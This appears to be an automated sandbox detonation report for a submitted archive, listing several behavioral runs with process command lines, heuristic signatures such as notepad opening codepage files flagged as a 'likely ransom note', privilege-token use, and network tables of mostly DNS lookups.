Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1254.txt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 6.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral26
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win10v2004-20240221-en
Max time kernel
90s
Max time network
152s
Command Line
Signatures
Enumerates physical storage devices
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bentonite.png
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win10v2004-20240221-en
Max time kernel
140s
Max time network
157s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1251.txt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.78.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.179.89.13.in-addr.arpa | udp |
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win7-20240221-en
Max time kernel
119s
Max time network
123s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1257.txt
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win7-20240220-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2856 wrote to memory of 2660 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
| PID 2856 wrote to memory of 2660 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
| PID 2856 wrote to memory of 2660 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\release_v4.rar
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\release_v4.rar"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win10v2004-20240221-en
Max time kernel
149s
Max time network
149s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3004 wrote to memory of 2060 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
| PID 3004 wrote to memory of 2060 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\release_v4.rar
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\release_v4.rar"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win7-20240221-en
Max time kernel
122s
Max time network
125s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1250.txt
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win10v2004-20240221-en
Max time kernel
132s
Max time network
155s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1250.txt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.78.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |